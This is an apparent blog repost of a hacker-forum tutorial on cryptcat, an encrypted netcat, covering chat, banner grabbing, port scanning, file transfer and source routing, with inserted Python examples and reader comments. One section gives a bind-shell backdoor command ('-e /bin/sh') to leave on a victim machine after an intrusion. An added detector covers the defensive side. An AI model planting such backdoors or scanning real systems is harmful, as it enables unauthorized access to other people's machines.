Thursday, May 17, 2012

Advanced Usage of the encrypt3d SwiSS army K.nife!

+=+=+=+=+=+=+=+=+=
Cryptcat: Advanced Usage
+=+=+=+=+=+=+=+=+=

++||||||> CRYPTCAT <|||||||||++

It is, basically, netcat with Twofish encryption turned ON. Instead of having communications sent/received in clear text, everything on the wire is Twofish-encrypted under a shared passphrase, so a sniffer on the path only sees ciphertext. Both ends must use the same passphrase: the default is "metallica", and you set your own with -k. That passphrase is the only secret; there is no key exchange, and a mismatched key simply turns the stream into garbage on the receiving end rather than producing an error.

Like netcat, this tool is often referred to as the "TCP/IP Swiss Army Knife", because of its ability to establish all kinds of connections across networks.

So, if you've ever used netcat, cryptcat should be easy to use. The command-line syntax is the same, plus -k for the passphrase.

Let's start by explaining the basic usage of it, by examples, then move on to m0re compleX stuff:
______________________________________________________________

First, to establish a connection between two machines, we'd go about this by:

-= making machine #1 (local/victim, IP 192.168.1.1) listen on a port =-

>$ cryptcat -l -p 3333

-= making machine #2 (remote/attacker, IP 192.168.1.2) connect to it =-

>$ cryptcat 192.168.1.1 3333

Whatever is typed on one end now appears on the other, Twofish-encrypted in transit. To use something other than the default passphrase, add -k <passphrase> to BOTH commands. The listener handles one connection and exits when it closes.
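What the passphrase actually buys you, as an added example that is not part of the original article or of cryptcat's own code: a Python model of the channel above. A socketpair stands in for the TCP connection and an HMAC-SHA256 counter-mode keystream stands in for Twofish (both are assumptions made purely to show what a sniffer sees; the keystream is not a cipher to reuse anywhere). The default passphrase "metallica" is cryptcat's real default for -k.

```python
"""Model of cryptcat's shared-key channel: what a sniffer sees, and what a
mismatched -k passphrase does.

Added example, not cryptcat's code. Assumptions: a socketpair stands in for
the TCP connection, and an HMAC-SHA256 counter-mode keystream stands in for
Twofish. It only models 'the wire carries ciphertext'; do not reuse it.
"""
import hashlib
import hmac
import os
import socket
import threading

DEFAULT_KEY = "metallica"  # cryptcat's default passphrase; override with -k
NONCE_LEN = 16


def keystream(passphrase: str, nonce: bytes, length: int) -> bytes:
    """Expand the shared passphrase and a per-connection nonce into `length` bytes."""
    key = hashlib.sha256(passphrase.encode("utf-8")).digest()
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def apply_keystream(passphrase: str, nonce: bytes, data: bytes) -> bytes:
    """XOR with the keystream; the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(passphrase, nonce, len(data))))


def exchange(client_key: str, server_key: str, message: bytes):
    """Client encrypts `message` under client_key and sends nonce||ciphertext;
    the server decrypts under server_key. Returns (bytes on the wire, what the
    server recovered). As with cryptcat, nothing authenticates the data: a
    wrong key yields junk of the right length, not an error."""
    client, server = socket.socketpair()
    wire, recovered = bytearray(), bytearray()

    def server_side():
        chunks = []
        while True:  # read until the client shuts down its write side
            data = server.recv(4096)
            if not data:
                break
            chunks.append(data)
        blob = b"".join(chunks)
        wire.extend(blob)  # exactly what a sniffer on the path would capture
        recovered.extend(apply_keystream(server_key, blob[:NONCE_LEN], blob[NONCE_LEN:]))

    t = threading.Thread(target=server_side)
    t.start()
    nonce = os.urandom(NONCE_LEN)  # fresh per connection so keystreams never repeat
    client.sendall(nonce + apply_keystream(client_key, nonce, message))
    client.shutdown(socket.SHUT_WR)
    t.join()
    client.close()
    server.close()
    return bytes(wire), bytes(recovered)


if __name__ == "__main__":
    msg = b"uname -a\n"
    wire, got = exchange(DEFAULT_KEY, DEFAULT_KEY, msg)
    print("on the wire      :", wire.hex())
    print("server recovered :", got)
    _, bad = exchange(DEFAULT_KEY, "not-the-key", msg)
    print("wrong key        :", bad)
```

Run it and you get the hex of what crosses the wire, the recovered command when the keys match, and on a mismatch the same number of bytes of junk with no error at all. That is why a typo in -k on one side looks like a dead or garbled connection rather than a failed login.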
______________________________________________________________

You can also use cryptcat for banner grabbing, i.e. for SMTP servers:

>$ cryptcat 192.168.1.1 25
220 192.168.1.1 ESMTP Sendmail 8.10.2+Sun/8.10.2; Sun, 19 Feb 2007 12:25:02 -0500 (EST)

this should connect you to the SMTP server, and output the server's name and version. One caveat: that only comes out readable if the far end is cryptcat too. An ordinary SMTP (or HTTP) daemon answers in clear text, and cryptcat runs the reply through Twofish decryption before printing it, so you get garbage; against cleartext services, use plain netcat with exactly the same syntax.

______________________________________________________________

You can also feed cryptcat a script to banner grab, say on an HTTP server, as such:

>$ cryptcat hostname 80 < get_reqst.txt

set get_reqst.txt to contain the following:

HEAD / HTTP/1.0[ENTER]
[ENTER]

(don't actually type in [ENTER], rather, just press it twice: the empty line is what tells the server the request headers are finished) duh!.

OR --- try (from the SHELL):

>$ echo -e "GET / HTTP/1.0\r\n\r\n" | cryptcat -w 5 192.168.1.1 80

The request line is "GET / HTTP/1.0" (the path goes after the method, not the IP), the two escaped line endings are the blank line that ends the headers, and -w 5 tells cryptcat to give up after 5 seconds without data instead of waiting forever.
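Here is the banner grabbing from the SMTP and HTTP examples above done in Python with plain sockets, added here as an example rather than taken from the article or from cryptcat. It builds the HEAD request with the CRLF framing the echo line is trying to produce, parses the 220 greeting into software and version, and includes a constructed stand-in daemon on 127.0.0.1 so it runs with no target at all. The HTTP reply and the daemon are made up for the demo; the SMTP banner is the one quoted above.

```python
"""Banner grabbing over plain TCP, plus the HTTP HEAD probe framed correctly.

Added example, not code from the original article or from cryptcat. It uses
plain sockets, which is what netcat does; cryptcat would encrypt the probe and
decrypt the reply, so a cleartext daemon's banner would come back as garbage.
The HTTP reply and the stand-in daemon are constructed for the demo; the SMTP
banner is the one quoted in the article.
"""
import re
import socket
import threading

SAMPLE_SMTP_BANNER = ("220 192.168.1.1 ESMTP Sendmail 8.10.2+Sun/8.10.2; "
                      "Sun, 19 Feb 2007 12:25:02 -0500 (EST)\r\n")
SAMPLE_HTTP_REPLY = (b"HTTP/1.0 200 OK\r\nServer: Apache/1.3.37\r\n"
                     b"Content-Type: text/html\r\n\r\n")


def http_head_request(host: str, path: str = "/") -> bytes:
    """HEAD request with CRLF line endings and the empty line that ends the
    headers; this is what the echo ... \\r\\n\\r\\n has to put on the wire."""
    return f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def parse_smtp_banner(banner: str):
    """Pull (code, hostname, software, version) out of an SMTP 220 greeting."""
    m = re.match(r"^(\d{3})[ -](\S+)\s+E?SMTP\s+(\S+)\s+([^\s;]+)", banner)
    return m.groups() if m else None


def parse_http_server(reply: bytes):
    """Return the Server: header value from an HTTP response, or None."""
    head = reply.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            return value.strip()
    return None


def grab_banner(host: str, port: int, probe: bytes = b"", timeout: float = 5.0,
                limit: int = 4096) -> bytes:
    """Connect, optionally send a probe, and read what the service volunteers
    until it closes or `timeout` seconds pass without data (netcat's -w)."""
    chunks, got = [], 0
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        while got < limit:
            try:
                data = s.recv(limit - got)
            except OSError:  # timeout or reset: treat as end of banner
                break
            if not data:
                break
            chunks.append(data)
            got += len(data)
    return b"".join(chunks)


def _serve_once(payload: bytes) -> int:
    """Constructed stand-in daemon on 127.0.0.1 for the demo: waits briefly for
    a probe, sends `payload` to one client, closes. Returns its ephemeral port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(0.5)
            try:
                conn.recv(1024)  # a client that speaks first (HTTP) sends its probe here
            except OSError:
                pass  # a client waiting for the greeting (SMTP) sends nothing
            conn.sendall(payload)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    port = _serve_once(SAMPLE_SMTP_BANNER.encode())
    print(parse_smtp_banner(grab_banner("127.0.0.1", port, timeout=2.0).decode()))
    port = _serve_once(SAMPLE_HTTP_REPLY)
    print(parse_http_server(grab_banner("127.0.0.1", port,
                                        http_head_request("127.0.0.1"), timeout=2.0)))
```

Point grab_banner at a real host and port and it behaves like the netcat one-liners, including the -w style idle timeout; the parsers are the bit the shell version leaves to your eyes.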

______________________________________________________________

Say, instead of using a ROOTKIT after intruding on a computer, you can simply use cryptcat to get a SHELL every time you connect to a port you tell the victim machine to listen on with cryptcat. This is a simple bind-shell backd00r. To do this, simply type on the local/victim machine:

>$ cryptcat -e /bin/sh -l -p 9999

(that's assuming the victim is running UNIX; on Windows it would be -e cmd.exe. Note that -e only exists in builds compiled with netcat's GAPING_SECURITY_HOLE option; if your copy rejects -e, that's why.)
Now, as the attacker, all you need to do is connect from your machine (or locally) to the victim, and that should spawn a shell for j00. Don't put -e on your own end: that would hand YOUR shell to the socket instead of giving you theirs.

>$ cryptcat 192.168.1.1 9999

Two things to remember: the listener dies when you disconnect, so you get exactly one session per start of cryptcat, and the passphrase is the only thing between that open port and anyone who scans it, so at least change it from the default with -k on both sides.
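The other side of the bind shell, added as an example and not taken from the article: if you are the one defending 192.168.1.1, this Python check walks `ss -ltnp` and `ps -eo pid,args` output and flags listeners owned by a netcat-family binary, with higher severity when the command line hands a shell to the socket via -e or -c. The sample outputs are constructed for the example (not a real capture) in the column layout those Linux tools print; the list of binary names and shell paths is an assumption you would extend for your environment.

```python
"""Detection: find netcat-style bind shells in `ss -ltnp` and `ps -eo pid,args`.

Added example, not from the article. The sample outputs below are constructed
(not a real capture) and follow the layout of the Linux ss and ps tools; on a
live host feed the same functions subprocess.check_output(["ss", "-ltnp"]) and
subprocess.check_output(["ps", "-eo", "pid,args"]) decoded to text.
"""
import re

SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       1       0.0.0.0:9999        0.0.0.0:*          users:(("cryptcat",pid=4242,fd=3))
LISTEN  0       1       0.0.0.0:4444        0.0.0.0:*          users:(("nc",pid=4300,fd=3))
LISTEN  0       511     127.0.0.1:3306      0.0.0.0:*          users:(("mysqld",pid=1300,fd=21))
"""

SAMPLE_PS = """\
  PID COMMAND
  812 /usr/sbin/sshd -D
 1300 /usr/sbin/mysqld
 4242 cryptcat -e /bin/sh -l -p 9999
 4300 nc -l -p 4444
"""

# Assumed names/paths; extend for your environment.
NETCAT_NAMES = {"nc", "ncat", "netcat", "cryptcat", "nc.traditional", "nc.openbsd"}
SHELLS = ("/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "cmd.exe", "powershell")
_PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=\d+\)')


def parse_ss(text: str):
    """Yield (port, process name, pid) for every LISTEN line that names a process."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "LISTEN":
            continue
        port = int(fields[3].rsplit(":", 1)[1])  # works for 0.0.0.0:9999 and [::]:9999
        for name, pid in _PROC_RE.findall(fields[5]):
            yield port, name, int(pid)


def parse_ps(text: str):
    """Map pid -> full command line, skipping the header row."""
    table = {}
    for line in text.splitlines()[1:]:
        pid, _, args = line.strip().partition(" ")
        if pid.isdigit():
            table[int(pid)] = args.strip()
    return table


def find_bind_shells(ss_text: str, ps_text: str):
    """Flag listeners run by a netcat-family binary. Severity 'high' when the
    command line attaches a shell to the socket (-e/-c), 'medium' otherwise."""
    cmdlines = parse_ps(ps_text)
    hits = []
    for port, name, pid in parse_ss(ss_text):
        if name not in NETCAT_NAMES:
            continue
        cmd = cmdlines.get(pid, "")
        execs_shell = re.search(r"(?:^|\s)-[ec]\s", cmd) is not None and any(s in cmd for s in SHELLS)
        hits.append({"pid": pid, "port": port, "process": name, "cmdline": cmd,
                     "severity": "high" if execs_shell else "medium"})
    return sorted(hits, key=lambda h: (h["severity"] != "high", h["port"]))


if __name__ == "__main__":
    for hit in find_bind_shells(SAMPLE_SS, SAMPLE_PS):
        print(f"[{hit['severity']:6}] pid {hit['pid']} port {hit['port']}: {hit['cmdline']}")
```

A plain `nc -l` listener is only "medium" because it may be a legitimate transfer, but a netcat binary listening with -e and a shell path has no innocent reading; that is the line an alert should fire on.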

______________________________________________________________

You can even make cryptcat act like a PORT SCANNER with:

>$ cryptcat -v -z 192.168.1.1 1-9999

this scans 192.168.1.1 for ports 1 to 9999. -z means "zero I/O": it completes the TCP handshake on each port and sends nothing, so -v lists the ports that accepted a connection, and since no data is exchanged the encryption never comes into play. Add -w 1 so a filtered port costs you one second rather than the default connect timeout.
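What -z does under the hood, as an added Python example (not from the article or from cryptcat): a TCP connect scan that completes a handshake per port, sends no data, and reports the ports that accepted, taking the same 1-9999 style port spec. The `connect` argument is an assumption of this snippet so the logic can be exercised without a network; by default it uses real sockets.

```python
"""TCP connect scan, the same thing `cryptcat -v -z host 1-9999` does: complete
a handshake per port, send nothing, report which ports accepted.

Added example, not the article's code. The `connect` parameter is pluggable
(an assumption of this snippet) so the scan logic can run without a network;
the default uses real sockets.
"""
import socket
from concurrent.futures import ThreadPoolExecutor


def parse_port_spec(spec: str):
    """'22,80,1-1024' -> sorted list of unique ports; rejects anything outside 1-65535."""
    ports = set()
    for part in spec.split(","):
        lo, _, hi = part.strip().partition("-")
        lo_i = int(lo)
        hi_i = int(hi) if hi else lo_i
        if not 1 <= lo_i <= hi_i <= 65535:
            raise ValueError(f"bad port range: {part!r}")
        ports.update(range(lo_i, hi_i + 1))
    return sorted(ports)


def tcp_connect(host: str, port: int, timeout: float) -> bool:
    """Real connector: True if the handshake completes; raises OSError otherwise."""
    with socket.create_connection((host, port), timeout=timeout):
        return True


def scan(host: str, ports, timeout: float = 0.5, connect=tcp_connect, workers: int = 64):
    """Return the sorted list of ports on `host` that accept a TCP connection.
    Refused, filtered (timed out) and unreachable ports all count as closed."""
    def probe(port):
        try:
            return port if connect(host, port, timeout) else None
        except OSError:  # ECONNREFUSED, timeout, EHOSTUNREACH, ...
            return None

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return sorted(p for p in pool.map(probe, ports) if p is not None)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print("open:", scan(target, parse_port_spec("1-1024")))
```

The thread pool is what makes a 1-9999 sweep bearable with a timeout per port; netcat does the same scan strictly one port at a time.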

______________________________________________________________

Also, you can use it to set the source IP address of the connection:

>$ cryptcat -s 69.13.37.69 192.168.1.1 3333

remember, the source IP address (69.13.37.69) comes before the remote IP address (192.168.1.1), and a port is still required. This makes the remote host respond to that address instead of your primary one, which is handy on a multi-homed box. It is not real sp00fing, though: -s just binds the socket to a local address, so if the address isn't configured on your machine the bind fails, and an address belonging to someone else would mean the SYN-ACK goes to them and the TCP handshake never completes. Don't start thinking of how malicious you can be with this!

______________________________________________________________

Ah, yes, and one of my favourites... Transferring Files. To do this, simply, set a computer (not necessarily a victim) to host a file (take_me.txt):

>$ cryptcat -v -l -p 9999 < take_me.txt

Now, to get take_me.txt, all we do on the client is redirect what comes back into a file:

>$ cryptcat -v -w 5 192.168.1.1 9999 > take_me.txt

Note: 192.168.1.1 is still the server/victim. The file goes over encrypted, which is the whole point, but cryptcat has no idea when the file is finished: the listener keeps the connection open after it hits end-of-file on stdin, so the -w 5 on the client makes it exit after 5 seconds without data instead of hanging. Afterwards compare a hash on both sides (md5sum or sha256sum take_me.txt) to make sure nothing was truncated, since a timeout cannot tell "done" from "stalled".
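The transfer above with the two things netcat itself won't do for you, added as an example rather than taken from the article or from cryptcat: an explicit end-of-file signal (the sender shuts down its write side, which is what -w/-q are working around) and a SHA-256 computed on both ends to catch a truncated copy. A socketpair stands in for the cryptcat connection and the file contents are constructed.

```python
"""File transfer the way the article does it (one side streams a file, the
other writes what arrives), plus what netcat lacks: an end-of-file signal and a
hash on both sides so a truncated or tampered copy is noticed.

Added example, not from the article or cryptcat. A socketpair stands in for
the cryptcat connection; the sample file contents are constructed.
"""
import hashlib
import os
import socket
import tempfile
import threading


def send_file(sock: socket.socket, path: str, chunk: int = 65536) -> str:
    """Stream `path` over `sock`, then shut down the write side so the receiver
    sees EOF instead of hanging (netcat needs -w/-q for this). Returns sha256."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        while True:
            buf = f.read(chunk)
            if not buf:
                break
            digest.update(buf)
            sock.sendall(buf)
    sock.shutdown(socket.SHUT_WR)
    return digest.hexdigest()


def recv_file(sock: socket.socket, path: str, chunk: int = 65536) -> str:
    """Write everything received until EOF to `path`; return its sha256."""
    digest = hashlib.sha256()
    with open(path, "wb") as f:
        while True:
            buf = sock.recv(chunk)
            if not buf:
                break
            digest.update(buf)
            f.write(buf)
    return digest.hexdigest()


def transfer(contents: bytes):
    """Push `contents` from a 'server' file through a socketpair into a 'client'
    file. Returns (sender digest, receiver digest, bytes the receiver wrote)."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "take_me.txt")
        dst = os.path.join(tmp, "received.txt")
        with open(src, "wb") as f:
            f.write(contents)
        server, client = socket.socketpair()
        result = {}
        receiver = threading.Thread(target=lambda: result.update(got=recv_file(client, dst)))
        receiver.start()
        sent = send_file(server, src)
        receiver.join()
        server.close()
        client.close()
        with open(dst, "rb") as f:
            received = f.read()
    return sent, result["got"], received


if __name__ == "__main__":
    sent, got, _ = transfer(b"take me\n" * 50000)
    print("sender  :", sent)
    print("receiver:", got, "OK" if sent == got else "MISMATCH")
```

With real cryptcat you get the same assurance by running sha256sum on take_me.txt at both ends and comparing by hand; the hash, not the absence of an error, is what tells you the copy is complete.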
______________________________________________________________

And finally, you can use it for source-routing to connect to a port on a remote host:

>$ cryptcat -g 69.13.37.69 192.168.1.1 9999

Note: 69.13.37.69 is the gateway we're asking the packets to go through (a loose source route hop; -g can be given up to 8 times) to reach 192.168.1.1 on port 9999. Expect this to fail on most networks: routers and hosts have dropped source-routed packets by default for years.

LINKS
HOMEPAGE: http://farm9.org/Cryptcat/
Download: http://sourceforge.net/projects/cryptcat/
Man Page: http://www.phlak.org/docs/tools/cryptcat.txt

Hope you learned s0mething at least. Expect more! And ...

Always Remember!
1: Netfish is RIGHT.
2: If {you think Netfish is WRONG} then SLAP YOURSELF, and goto the FIRST POINT.

Comments

only_samurai on February 19 2007 - 14:44:48
yet another badass article by the netfish.... let no one say he doesn't contribute. .... lol netfish.... enjoyed the article tho.... :ninja:
HardHackz on February 19 2007 - 15:23:15
o.0 A little confused, next time explain the O/S, that it's unix, etc. Good job though.
nights_shadow on February 19 2007 - 17:52:03
Interesting, never even heard of cryptcat, good read.
-The_Flash- on February 19 2007 - 19:45:37
Keep up the great articles dude. Awesome to read something worthwhile
netfish on February 19 2007 - 23:35:21
@HardHackz ... no need to explain what OS it is for; it has ports to pretty much all the main ones, comprising Windows NT, BSD and Linux. The syntax remains the same on all those platforms too.
end3r on February 21 2007 - 03:36:52
good article, nice info.
sleazoid on February 21 2007 - 03:51:14
nice work man!:happy:
sirus69 on March 06 2007 - 08:15:05
waste of time
Ratings
Awesome! 71% [5 Votes]
Very Good 14% [1 Vote]
Good 0% [No Votes]
Average 0% [No Votes]
Poor 14% [1 Vote]
© HellBound Hackers 2008- 2009. Since 3rd December 2004.